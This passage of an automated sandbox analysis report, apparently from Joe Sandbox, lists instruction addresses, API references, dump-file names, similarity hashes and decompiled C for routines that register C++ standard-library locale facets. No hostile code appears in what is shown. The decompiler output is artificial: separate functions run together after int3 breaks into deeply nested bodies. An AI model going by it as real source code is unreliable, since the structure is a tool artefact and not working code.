0x0132b1b4
0x0132b1c0
0x0132b16e
0x0132b16e
0x0132b170
0x0132b176
0x0132b17c
0x0132b184
0x0132b187
0x0132b1c1
0x0132b1c6
0x0132b1c7
0x0132b1ce
0x0132b1d8
0x0132b1dd
0x0132b1e8
0x0132b1ec
0x0132b1fd
0x0132b1ff
0x0132b201
0x0132b246
0x0132b249
0x0132b255
0x0132b203
0x0132b203
0x0132b205
0x0132b20b
0x0132b211
0x0132b219
0x0132b21c
0x0132b256
0x0132b25b
0x0132b25c
0x0132b263
0x0132b26d
0x0132b272
0x0132b27d
0x0132b281
0x0132b292
0x0132b294
0x0132b296
0x0132b2db
0x0132b2de
0x0132b2ea
0x0132b298
0x0132b298
0x0132b29a
0x0132b2a0
0x0132b2a6
0x0132b2ae
0x0132b2b1
0x0132b2eb
0x0132b2f0
0x0132b2f1
0x0132b2f8
0x0132b302
0x0132b307
0x0132b312
0x0132b316
0x0132b327
0x0132b329
0x0132b32b
0x0132b370
0x0132b373
0x0132b37f
0x0132b32d
0x0132b32d
0x0132b32f
0x0132b335
0x0132b33b
0x0132b343
0x0132b346
0x0132b380
0x0132b385
0x0132b386
0x0132b38d
0x0132b397
0x0132b39c
0x0132b3a7
0x0132b3ab
0x0132b3bc
0x0132b3be
0x0132b3c0
0x0132b405
0x0132b408
0x0132b414
0x0132b3c2
0x0132b3c2
0x0132b3c4
0x0132b3ca
0x0132b3d0
0x0132b3d8
0x0132b3db
0x0132b415
0x0132b41a
0x0132b41b
0x0132b422
0x0132b42c
0x0132b431
0x0132b43c
0x0132b440
0x0132b451
0x0132b453
0x0132b455
0x0132b49a
0x0132b49d
0x0132b4a9
0x0132b457
0x0132b457
0x0132b459
0x0132b45f
0x0132b465
0x0132b466
0x0132b46c
0x0132b46d
0x0132b470
0x0132b4aa
0x0132b4af
0x0132b4b0
0x0132b4b7
0x0132b4bc
0x0132b4be
0x0132b4c4
0x0132b4c7
0x0132b4ca
0x0132b4ca
0x0132b4ca
0x0132b4ce
0x0132b4d4
0x0132b4e0
0x0132b472
0x0132b472
0x0132b475
0x0132b479
0x0132b47d
0x0132b48a
0x0132b492
0x0132b494
0x00000000
0x0132b494
0x0132b45b
0x0132b45b
0x00000000
0x0132b45b
0x0132b459
0x0132b3dd
0x0132b3dd
0x0132b3e0
0x0132b3e4
0x0132b3e8
0x0132b3f5
0x0132b3fd
0x0132b3ff
0x00000000
0x0132b3ff
0x0132b3c6
0x0132b3c6
0x00000000
0x0132b3c6
0x0132b3c4
0x0132b348
0x0132b348
0x0132b34b
0x0132b34f
0x0132b353
0x0132b360
0x0132b368
0x0132b36a
0x00000000
0x0132b36a
0x0132b331
0x0132b331
0x00000000
0x0132b331
0x0132b32f
0x0132b2b3
0x0132b2b3
0x0132b2b6
0x0132b2ba
0x0132b2be
0x0132b2cb
0x0132b2d3
0x0132b2d5
0x00000000
0x0132b2d5
0x0132b29c
0x0132b29c
0x00000000
0x0132b29c
0x0132b29a
0x0132b21e
0x0132b21e
0x0132b221
0x0132b225
0x0132b229
0x0132b236
0x0132b23e
0x0132b240
0x00000000
0x0132b240
0x0132b207
0x0132b207
0x00000000
0x0132b207
0x0132b205
0x0132b189
0x0132b189
0x0132b18c
0x0132b190
0x0132b194
0x0132b1a1
0x0132b1a9
0x0132b1ab
0x00000000
0x0132b1ab
0x0132b172
0x0132b172
0x00000000
0x0132b172
0x0132b170
0x0132b0f4
0x0132b0f4
0x0132b0f7
0x0132b0fb
0x0132b0ff
0x0132b10c
0x0132b114
0x0132b116
0x00000000
0x0132b116
0x0132b0dd
0x0132b0dd
0x00000000
0x0132b0dd
0x0132b0db
0x0132b05f
0x0132b05f
0x0132b062
0x0132b066
0x0132b06a
0x0132b077
0x0132b07f
0x0132b081
0x00000000
0x0132b081
0x0132b048
0x0132b048
0x00000000
0x0132b048
0x0132b046

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0132B019

Part of subcall function 012F9850: std::_Lockit::_Lockit.LIBCPMT ref: 012F986D
Part of subcall function 012F9850: std::_Lockit::~_Lockit.LIBCPMT ref: 012F9889

collate.LIBCPMT ref: 0132B053
std::_Facet_Register.LIBCPMT ref: 0132B06A
std::_Lockit::~_Lockit.LIBCPMT ref: 0132B08A
Concurrency::cancel_current_task.LIBCPMT ref: 0132B097

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registercollate
String ID:
API String ID: 3223962878-0
Opcode ID: 54536a74519d51207186fb3826b8b1ce2fa1dbf69b1e28559a9ff78001842858
Instruction ID: 853773e812d96777c2f6a274a72c6e2fd819c5d18d3474b885d7ca5069261be8
Opcode Fuzzy Hash: 54536a74519d51207186fb3826b8b1ce2fa1dbf69b1e28559a9ff78001842858
Instruction Fuzzy Hash: FD01D6369002268FDF16FB68C4046BEBBB9BF54728F644408D52167388CF34AE04CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0132B09D, Relevance: 7.5, APIs: 5, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0132B09D(void* __eflags, void* __fp0) {
				signed int _t95;
				void* _t166;
				signed int _t243;
				void* _t265;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				signed int _t280;
				void* _t288;

				_t292 = __fp0;
				_push(8);
				E0132F1B6(0x1368615, __eflags);
				E013177B6(_t288 - 0x14, 0);
				_t273 =  *0x13aaaa4; // 0x0
				 *(_t288 - 4) =  *(_t288 - 4) & 0x00000000;
				 *(_t288 - 0x10) = _t273;
				_t95 = E012F9A10( *((intOrPtr*)(_t288 + 8)), E012F9850(0x13aaa84));
				_t266 = _t95;
				if(_t95 != 0) {
					L5:
					E0131780E(_t288 - 0x14);
					return E0132F190(_t266, _t291);
				} else {
					_t291 = _t273;
					if(_t273 == 0) {
						_push( *((intOrPtr*)(_t288 + 8)));
						_push(_t288 - 0x10);
						__eflags = E0132B659(_t273, __eflags) - 0xffffffff;
						if(__eflags == 0) {
							E012F9060();
							asm("int3");
							_push(8);
							E0132F1B6(0x1368615, __eflags);
							E013177B6(_t288 - 0x14, 0);
							_t274 =  *0x13aaaa8; // 0x0
							 *(_t288 - 4) =  *(_t288 - 4) & 0x00000000;
							 *(_t288 - 0x10) = _t274;
							_t267 = E012F9A10( *((intOrPtr*)(_t288 + 8)), E012F9850(0x13aaa88));
							__eflags = _t267;
							if(_t267 != 0) {
								L12:
								E0131780E(_t288 - 0x14);
								return E0132F190(_t267, __eflags);
							} else {
								__eflags = _t274;
								if(__eflags == 0) {
									_push( *((intOrPtr*)(_t288 + 8)));
									_push(_t288 - 0x10);
									__eflags = E0132B6C1(_t274, __eflags) - 0xffffffff;
									if(__eflags == 0) {
										E012F9060();
										asm("int3");
										_push(8);
										E0132F1B6(0x1368615, __eflags);
										E013177B6(_t288 - 0x14, 0);
										_t275 =  *0x13aaaac; // 0x0
										 *(_t288 - 4) =  *(_t288 - 4) & 0x00000000;
										 *(_t288 - 0x10) = _t275;
										_t268 = E012F9A10( *((intOrPtr*)(_t288 + 8)), E012F9850(0x13aaa8c));
										__eflags = _t268;
										if(_t268 != 0) {
											L19:
											E0131780E(_t288 - 0x14);
											return E0132F190(_t268, __eflags);
										} else {
											__eflags = _t275;
											if(__eflags == 0) {
												_push( *((intOrPtr*)(_t288 + 8)));
												_push(_t288 - 0x10);
												__eflags = E0132B729(_t275, __eflags) - 0xffffffff;
												if(__eflags == 0) {
													E012F9060();
													asm("int3");
													_push(8);
													E0132F1B6(0x1368615, __eflags);
													E013177B6(_t288 - 0x14, 0);
													_t276 =  *0x13aaab4; // 0x0
													 *(_t288 - 4) =  *(_t288 - 4) & 0x00000000;
													 *(_t288 - 0x10) = _t276;
													_t269 = E012F9A10( *((intOrPtr*)(_t288 + 8)), E012F9850(0x13aaa94));
													__eflags = _t269;
													if(_t269 != 0) {
														L26:
														E0131780E(_t288 - 0x14);
														return E0132F190(_t269, __eflags);
													} else {
														__eflags = _t276;
														if(__eflags == 0) {
															_push( *((intOrPtr*)(_t288 + 8)));
															_push(_t288 - 0x10);
															__eflags = E0132B791(_t276, __eflags, __fp0) - 0xffffffff;
															if(__eflags == 0) {
																E012F9060();
																asm("int3");
																_push(8);
																E0132F1B6(0x1368615, __eflags);
																E013177B6(_t288 - 0x14, 0);
																_t277 =  *0x13aaab0; // 0x0
																 *(_t288 - 4) =  *(_t288 - 4) & 0x00000000;
																 *(_t288 - 0x10) = _t277;
																_t270 = E012F9A10( *((intOrPtr*)(_t288 + 8)), E012F9850(0x13aaa90));
																__eflags = _t270;
																if(_t270 != 0) {
																	L33:
																	E0131780E(_t288 - 0x14);
																	return E0132F190(_t270, __eflags);
																} else {
																	__eflags = _t277;
																	if(__eflags == 0) {
																		_push( *((intOrPtr*)(_t288 + 8)));
																		_push(_t288 - 0x10);
																		__eflags = E0132B815(_t277, __eflags, __fp0) - 0xffffffff;
																		if(__eflags == 0) {
																			E012F9060();
																			asm("int3");
																			_push(8);
																			E0132F1B6(0x1368615, __eflags);
																			E013177B6(_t288 - 0x14, 0);
																			_t278 =  *0x13aaab8; // 0x0
																			 *(_t288 - 4) =  *(_t288 - 4) & 0x00000000;
																			 *(_t288 - 0x10) = _t278;
																			_t271 = E012F9A10( *((intOrPtr*)(_t288 + 8)), E012F9850(0x13aaa98));
																			__eflags = _t271;
																			if(_t271 != 0) {
																				L40:
																				E0131780E(_t288 - 0x14);
																				return E0132F190(_t271, __eflags);
																			} else {
																				__eflags = _t278;
																				if(__eflags == 0) {
																					_push( *((intOrPtr*)(_t288 + 8)));
																					_push(_t288 - 0x10);
																					__eflags = E0132B89A(__eflags, __fp0) - 0xffffffff;
																					if(__eflags == 0) {
																						E012F9060();
																						asm("int3");
																						_push(8);
																						E0132F1B6(0x1368615, __eflags);
																						E013177B6(_t288 - 0x14, 0);
																						_t279 =  *0x13aaabc; // 0x0
																						 *(_t288 - 4) =  *(_t288 - 4) & 0x00000000;
																						 *(_t288 - 0x10) = _t279;
																						_t272 = E012F9A10( *((intOrPtr*)(_t288 + 8)), E012F9850(0x13aaa9c));
																						__eflags = _t272;
																						if(_t272 != 0) {
																							L47:
																							E0131780E(_t288 - 0x14);
																							return E0132F190(_t272, __eflags);
																						} else {
																							__eflags = _t279;
																							if(__eflags == 0) {
																								_push( *((intOrPtr*)(_t288 + 8)));
																								_push(_t288 - 0x10);
																								_t166 = E0132B906(_t265, _t279, __eflags);
																								_pop(_t243);
																								__eflags = _t166 - 0xffffffff;
																								if(__eflags == 0) {
																									E012F9060();
																									asm("int3");
																									_push(4);
																									E0132F1B6(0x1368ad3, __eflags);
																									_t280 = _t243;
																									 *(_t288 - 0x10) = _t280;
																									 *((intOrPtr*)(_t280 + 4)) =  *((intOrPtr*)(_t288 + 0xc));
																									_push( *((intOrPtr*)(_t288 + 8)));
																									_t89 = _t288 - 4;
																									 *_t89 =  *(_t288 - 4) & 0x00000000;
																									__eflags =  *_t89;
																									 *_t280 = 0x1376c58;
																									E0132C81A(_t243, _t265, __eflags, _t292);
																									return E0132F190(_t280, __eflags);
																								} else {
																									_t272 =  *(_t288 - 0x10);
																									 *(_t288 - 0x10) = _t272;
																									 *(_t288 - 4) = 1;
																									E0131792B(__eflags, _t272);
																									 *0x1374358();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t272 + 4))))();
																									 *0x13aaabc = _t272;
																									goto L47;
																								}
																							} else {
																								_t272 = _t279;
																								goto L47;
																							}
																						}
																					} else {
																						_t271 =  *(_t288 - 0x10);
																						 *(_t288 - 0x10) = _t271;
																						 *(_t288 - 4) = 1;
																						E0131792B(__eflags, _t271);
																						 *0x1374358();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t271 + 4))))();
																						 *0x13aaab8 = _t271;
																						goto L40;
																					}
																				} else {
																					_t271 = _t278;
																					goto L40;
																				}
																			}
																		} else {
																			_t270 =  *(_t288 - 0x10);
																			 *(_t288 - 0x10) = _t270;
																			 *(_t288 - 4) = 1;
																			E0131792B(__eflags, _t270);
																			 *0x1374358();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t270 + 4))))();
																			 *0x13aaab0 = _t270;
																			goto L33;
																		}
																	} else {
																		_t270 = _t277;
																		goto L33;
																	}
																}
															} else {
																_t269 =  *(_t288 - 0x10);
																 *(_t288 - 0x10) = _t269;
																 *(_t288 - 4) = 1;
																E0131792B(__eflags, _t269);
																 *0x1374358();
																 *((intOrPtr*)( *((intOrPtr*)( *_t269 + 4))))();
																 *0x13aaab4 = _t269;
																goto L26;
															}
														} else {
															_t269 = _t276;
															goto L26;
														}
													}
												} else {
													_t268 =  *(_t288 - 0x10);
													 *(_t288 - 0x10) = _t268;
													 *(_t288 - 4) = 1;
													E0131792B(__eflags, _t268);
													 *0x1374358();
													 *((intOrPtr*)( *((intOrPtr*)( *_t268 + 4))))();
													 *0x13aaaac = _t268;
													goto L19;
												}
											} else {
												_t268 = _t275;
												goto L19;
											}
										}
									} else {
										_t267 =  *(_t288 - 0x10);
										 *(_t288 - 0x10) = _t267;
										 *(_t288 - 4) = 1;
										E0131792B(__eflags, _t267);
										 *0x1374358();
										 *((intOrPtr*)( *((intOrPtr*)( *_t267 + 4))))();
										 *0x13aaaa8 = _t267;
										goto L12;
									}
								} else {
									_t267 = _t274;
									goto L12;
								}
							}
						} else {
							_t266 =  *(_t288 - 0x10);
							 *(_t288 - 0x10) = _t266;
							 *(_t288 - 4) = 1;
							E0131792B(__eflags, _t266);
							 *0x1374358();
							 *((intOrPtr*)( *((intOrPtr*)( *_t266 + 4))))();
							 *0x13aaaa4 = _t266;
							goto L5;
						}
					} else {
						_t266 = _t273;
						goto L5;
					}
				}
			}

0x0132b09d
0x0132b09d
0x0132b0a4
0x0132b0ae
0x0132b0b3
0x0132b0be
0x0132b0c2
0x0132b0ce
0x0132b0d3
0x0132b0d7
0x0132b11c
0x0132b11f
0x0132b12b
0x0132b0d9
0x0132b0d9
0x0132b0db
0x0132b0e1
0x0132b0e7
0x0132b0ef
0x0132b0f2
0x0132b12c
0x0132b131
0x0132b132
0x0132b139
0x0132b143
0x0132b148
0x0132b153
0x0132b157
0x0132b168
0x0132b16a
0x0132b16c
0x0132b1b1
0x0132b1b4
0x0132b1c0
0x0132b16e
0x0132b16e
0x0132b170
0x0132b176
0x0132b17c
0x0132b184
0x0132b187
0x0132b1c1
0x0132b1c6
0x0132b1c7
0x0132b1ce
0x0132b1d8
0x0132b1dd
0x0132b1e8
0x0132b1ec
0x0132b1fd
0x0132b1ff
0x0132b201
0x0132b246
0x0132b249
0x0132b255
0x0132b203
0x0132b203
0x0132b205
0x0132b20b
0x0132b211
0x0132b219
0x0132b21c
0x0132b256
0x0132b25b
0x0132b25c
0x0132b263
0x0132b26d
0x0132b272
0x0132b27d
0x0132b281
0x0132b292
0x0132b294
0x0132b296
0x0132b2db
0x0132b2de
0x0132b2ea
0x0132b298
0x0132b298
0x0132b29a
0x0132b2a0
0x0132b2a6
0x0132b2ae
0x0132b2b1
0x0132b2eb
0x0132b2f0
0x0132b2f1
0x0132b2f8
0x0132b302
0x0132b307
0x0132b312
0x0132b316
0x0132b327
0x0132b329
0x0132b32b
0x0132b370
0x0132b373
0x0132b37f
0x0132b32d
0x0132b32d
0x0132b32f
0x0132b335
0x0132b33b
0x0132b343
0x0132b346
0x0132b380
0x0132b385
0x0132b386
0x0132b38d
0x0132b397
0x0132b39c
0x0132b3a7
0x0132b3ab
0x0132b3bc
0x0132b3be
0x0132b3c0
0x0132b405
0x0132b408
0x0132b414
0x0132b3c2
0x0132b3c2
0x0132b3c4
0x0132b3ca
0x0132b3d0
0x0132b3d8
0x0132b3db
0x0132b415
0x0132b41a
0x0132b41b
0x0132b422
0x0132b42c
0x0132b431
0x0132b43c
0x0132b440
0x0132b451
0x0132b453
0x0132b455
0x0132b49a
0x0132b49d
0x0132b4a9
0x0132b457
0x0132b457
0x0132b459
0x0132b45f
0x0132b465
0x0132b466
0x0132b46c
0x0132b46d
0x0132b470
0x0132b4aa
0x0132b4af
0x0132b4b0
0x0132b4b7
0x0132b4bc
0x0132b4be
0x0132b4c4
0x0132b4c7
0x0132b4ca
0x0132b4ca
0x0132b4ca
0x0132b4ce
0x0132b4d4
0x0132b4e0
0x0132b472
0x0132b472
0x0132b475
0x0132b479
0x0132b47d
0x0132b48a
0x0132b492
0x0132b494
0x00000000
0x0132b494
0x0132b45b
0x0132b45b
0x00000000
0x0132b45b
0x0132b459
0x0132b3dd
0x0132b3dd
0x0132b3e0
0x0132b3e4
0x0132b3e8
0x0132b3f5
0x0132b3fd
0x0132b3ff
0x00000000
0x0132b3ff
0x0132b3c6
0x0132b3c6
0x00000000
0x0132b3c6
0x0132b3c4
0x0132b348
0x0132b348
0x0132b34b
0x0132b34f
0x0132b353
0x0132b360
0x0132b368
0x0132b36a
0x00000000
0x0132b36a
0x0132b331
0x0132b331
0x00000000
0x0132b331
0x0132b32f
0x0132b2b3
0x0132b2b3
0x0132b2b6
0x0132b2ba
0x0132b2be
0x0132b2cb
0x0132b2d3
0x0132b2d5
0x00000000
0x0132b2d5
0x0132b29c
0x0132b29c
0x00000000
0x0132b29c
0x0132b29a
0x0132b21e
0x0132b21e
0x0132b221
0x0132b225
0x0132b229
0x0132b236
0x0132b23e
0x0132b240
0x00000000
0x0132b240
0x0132b207
0x0132b207
0x00000000
0x0132b207
0x0132b205
0x0132b189
0x0132b189
0x0132b18c
0x0132b190
0x0132b194
0x0132b1a1
0x0132b1a9
0x0132b1ab
0x00000000
0x0132b1ab
0x0132b172
0x0132b172
0x00000000
0x0132b172
0x0132b170
0x0132b0f4
0x0132b0f4
0x0132b0f7
0x0132b0fb
0x0132b0ff
0x0132b10c
0x0132b114
0x0132b116
0x00000000
0x0132b116
0x0132b0dd
0x0132b0dd
0x00000000
0x0132b0dd
0x0132b0db

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0132B0AE

Part of subcall function 012F9850: std::_Lockit::_Lockit.LIBCPMT ref: 012F986D
Part of subcall function 012F9850: std::_Lockit::~_Lockit.LIBCPMT ref: 012F9889

messages.LIBCPMT ref: 0132B0E8
std::_Facet_Register.LIBCPMT ref: 0132B0FF
std::_Lockit::~_Lockit.LIBCPMT ref: 0132B11F
Concurrency::cancel_current_task.LIBCPMT ref: 0132B12C

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermessages
String ID:
API String ID: 4267825564-0
Opcode ID: 4679beaeb03899a71832fe61a2a4d5237868ba2912d3ee2df7c641735aedcf69
Instruction ID: a3f5f5d715d33210288b42519baa19952fa42fd3dbacd38f07ee3e6b72c53aec
Opcode Fuzzy Hash: 4679beaeb03899a71832fe61a2a4d5237868ba2912d3ee2df7c641735aedcf69
Instruction Fuzzy Hash: 5E01D6369101268BDF15FB68C5147BEFBB9AF54728F240008E6116B284CF34A944CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0132B25C, Relevance: 7.5, APIs: 5, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0132B25C(void* __eflags, void* __fp0) {
				signed int _t59;
				void* _t97;
				signed int _t144;
				void* _t157;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				signed int _t162;
				signed int _t163;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				void* _t171;

				_t175 = __fp0;
				_push(8);
				E0132F1B6(0x1368615, __eflags);
				E013177B6(_t171 - 0x14, 0);
				_t162 =  *0x13aaab4; // 0x0
				 *(_t171 - 4) =  *(_t171 - 4) & 0x00000000;
				 *(_t171 - 0x10) = _t162;
				_t59 = E012F9A10( *((intOrPtr*)(_t171 + 8)), E012F9850(0x13aaa94));
				_t158 = _t59;
				if(_t59 != 0) {
					L5:
					E0131780E(_t171 - 0x14);
					return E0132F190(_t158, _t174);
				} else {
					_t174 = _t162;
					if(_t162 == 0) {
						_push( *((intOrPtr*)(_t171 + 8)));
						_push(_t171 - 0x10);
						__eflags = E0132B791(_t162, __eflags, __fp0) - 0xffffffff;
						if(__eflags == 0) {
							E012F9060();
							asm("int3");
							_push(8);
							E0132F1B6(0x1368615, __eflags);
							E013177B6(_t171 - 0x14, 0);
							_t163 =  *0x13aaab0; // 0x0
							 *(_t171 - 4) =  *(_t171 - 4) & 0x00000000;
							 *(_t171 - 0x10) = _t163;
							_t159 = E012F9A10( *((intOrPtr*)(_t171 + 8)), E012F9850(0x13aaa90));
							__eflags = _t159;
							if(_t159 != 0) {
								L12:
								E0131780E(_t171 - 0x14);
								return E0132F190(_t159, __eflags);
							} else {
								__eflags = _t163;
								if(__eflags == 0) {
									_push( *((intOrPtr*)(_t171 + 8)));
									_push(_t171 - 0x10);
									__eflags = E0132B815(_t163, __eflags, __fp0) - 0xffffffff;
									if(__eflags == 0) {
										E012F9060();
										asm("int3");
										_push(8);
										E0132F1B6(0x1368615, __eflags);
										E013177B6(_t171 - 0x14, 0);
										_t164 =  *0x13aaab8; // 0x0
										 *(_t171 - 4) =  *(_t171 - 4) & 0x00000000;
										 *(_t171 - 0x10) = _t164;
										_t160 = E012F9A10( *((intOrPtr*)(_t171 + 8)), E012F9850(0x13aaa98));
										__eflags = _t160;
										if(_t160 != 0) {
											L19:
											E0131780E(_t171 - 0x14);
											return E0132F190(_t160, __eflags);
										} else {
											__eflags = _t164;
											if(__eflags == 0) {
												_push( *((intOrPtr*)(_t171 + 8)));
												_push(_t171 - 0x10);
												__eflags = E0132B89A(__eflags, __fp0) - 0xffffffff;
												if(__eflags == 0) {
													E012F9060();
													asm("int3");
													_push(8);
													E0132F1B6(0x1368615, __eflags);
													E013177B6(_t171 - 0x14, 0);
													_t165 =  *0x13aaabc; // 0x0
													 *(_t171 - 4) =  *(_t171 - 4) & 0x00000000;
													 *(_t171 - 0x10) = _t165;
													_t161 = E012F9A10( *((intOrPtr*)(_t171 + 8)), E012F9850(0x13aaa9c));
													__eflags = _t161;
													if(_t161 != 0) {
														L26:
														E0131780E(_t171 - 0x14);
														return E0132F190(_t161, __eflags);
													} else {
														__eflags = _t165;
														if(__eflags == 0) {
															_push( *((intOrPtr*)(_t171 + 8)));
															_push(_t171 - 0x10);
															_t97 = E0132B906(_t157, _t165, __eflags);
															_pop(_t144);
															__eflags = _t97 - 0xffffffff;
															if(__eflags == 0) {
																E012F9060();
																asm("int3");
																_push(4);
																E0132F1B6(0x1368ad3, __eflags);
																_t166 = _t144;
																 *(_t171 - 0x10) = _t166;
																 *((intOrPtr*)(_t166 + 4)) =  *((intOrPtr*)(_t171 + 0xc));
																_push( *((intOrPtr*)(_t171 + 8)));
																_t53 = _t171 - 4;
																 *_t53 =  *(_t171 - 4) & 0x00000000;
																__eflags =  *_t53;
																 *_t166 = 0x1376c58;
																E0132C81A(_t144, _t157, __eflags, _t175);
																return E0132F190(_t166, __eflags);
															} else {
																_t161 =  *(_t171 - 0x10);
																 *(_t171 - 0x10) = _t161;
																 *(_t171 - 4) = 1;
																E0131792B(__eflags, _t161);
																 *0x1374358();
																 *((intOrPtr*)( *((intOrPtr*)( *_t161 + 4))))();
																 *0x13aaabc = _t161;
																goto L26;
															}
														} else {
															_t161 = _t165;
															goto L26;
														}
													}
												} else {
													_t160 =  *(_t171 - 0x10);
													 *(_t171 - 0x10) = _t160;
													 *(_t171 - 4) = 1;
													E0131792B(__eflags, _t160);
													 *0x1374358();
													 *((intOrPtr*)( *((intOrPtr*)( *_t160 + 4))))();
													 *0x13aaab8 = _t160;
													goto L19;
												}
											} else {
												_t160 = _t164;
												goto L19;
											}
										}
									} else {
										_t159 =  *(_t171 - 0x10);
										 *(_t171 - 0x10) = _t159;
										 *(_t171 - 4) = 1;
										E0131792B(__eflags, _t159);
										 *0x1374358();
										 *((intOrPtr*)( *((intOrPtr*)( *_t159 + 4))))();
										 *0x13aaab0 = _t159;
										goto L12;
									}
								} else {
									_t159 = _t163;
									goto L12;
								}
							}
						} else {
							_t158 =  *(_t171 - 0x10);
							 *(_t171 - 0x10) = _t158;
							 *(_t171 - 4) = 1;
							E0131792B(__eflags, _t158);
							 *0x1374358();
							 *((intOrPtr*)( *((intOrPtr*)( *_t158 + 4))))();
							 *0x13aaab4 = _t158;
							goto L5;
						}
					} else {
						_t158 = _t162;
						goto L5;
					}
				}
			}

0x0132b25c
0x0132b25c
0x0132b263
0x0132b26d
0x0132b272
0x0132b27d
0x0132b281
0x0132b28d
0x0132b292
0x0132b296
0x0132b2db
0x0132b2de
0x0132b2ea
0x0132b298
0x0132b298
0x0132b29a
0x0132b2a0
0x0132b2a6
0x0132b2ae
0x0132b2b1
0x0132b2eb
0x0132b2f0
0x0132b2f1
0x0132b2f8
0x0132b302
0x0132b307
0x0132b312
0x0132b316
0x0132b327
0x0132b329
0x0132b32b
0x0132b370
0x0132b373
0x0132b37f
0x0132b32d
0x0132b32d
0x0132b32f
0x0132b335
0x0132b33b
0x0132b343
0x0132b346
0x0132b380
0x0132b385
0x0132b386
0x0132b38d
0x0132b397
0x0132b39c
0x0132b3a7
0x0132b3ab
0x0132b3bc
0x0132b3be
0x0132b3c0
0x0132b405
0x0132b408
0x0132b414
0x0132b3c2
0x0132b3c2
0x0132b3c4
0x0132b3ca
0x0132b3d0
0x0132b3d8
0x0132b3db
0x0132b415
0x0132b41a
0x0132b41b
0x0132b422
0x0132b42c
0x0132b431
0x0132b43c
0x0132b440
0x0132b451
0x0132b453
0x0132b455
0x0132b49a
0x0132b49d
0x0132b4a9
0x0132b457
0x0132b457
0x0132b459
0x0132b45f
0x0132b465
0x0132b466
0x0132b46c
0x0132b46d
0x0132b470
0x0132b4aa
0x0132b4af
0x0132b4b0
0x0132b4b7
0x0132b4bc
0x0132b4be
0x0132b4c4
0x0132b4c7
0x0132b4ca
0x0132b4ca
0x0132b4ca
0x0132b4ce
0x0132b4d4
0x0132b4e0
0x0132b472
0x0132b472
0x0132b475
0x0132b479
0x0132b47d
0x0132b48a
0x0132b492
0x0132b494
0x00000000
0x0132b494
0x0132b45b
0x0132b45b
0x00000000
0x0132b45b
0x0132b459
0x0132b3dd
0x0132b3dd
0x0132b3e0
0x0132b3e4
0x0132b3e8
0x0132b3f5
0x0132b3fd
0x0132b3ff
0x00000000
0x0132b3ff
0x0132b3c6
0x0132b3c6
0x00000000
0x0132b3c6
0x0132b3c4
0x0132b348
0x0132b348
0x0132b34b
0x0132b34f
0x0132b353
0x0132b360
0x0132b368
0x0132b36a
0x00000000
0x0132b36a
0x0132b331
0x0132b331
0x00000000
0x0132b331
0x0132b32f
0x0132b2b3
0x0132b2b3
0x0132b2b6
0x0132b2ba
0x0132b2be
0x0132b2cb
0x0132b2d3
0x0132b2d5
0x00000000
0x0132b2d5
0x0132b29c
0x0132b29c
0x00000000
0x0132b29c
0x0132b29a

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0132B26D

Part of subcall function 012F9850: std::_Lockit::_Lockit.LIBCPMT ref: 012F986D
Part of subcall function 012F9850: std::_Lockit::~_Lockit.LIBCPMT ref: 012F9889

moneypunct.LIBCPMT ref: 0132B2A7
std::_Facet_Register.LIBCPMT ref: 0132B2BE
std::_Lockit::~_Lockit.LIBCPMT ref: 0132B2DE
Concurrency::cancel_current_task.LIBCPMT ref: 0132B2EB

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

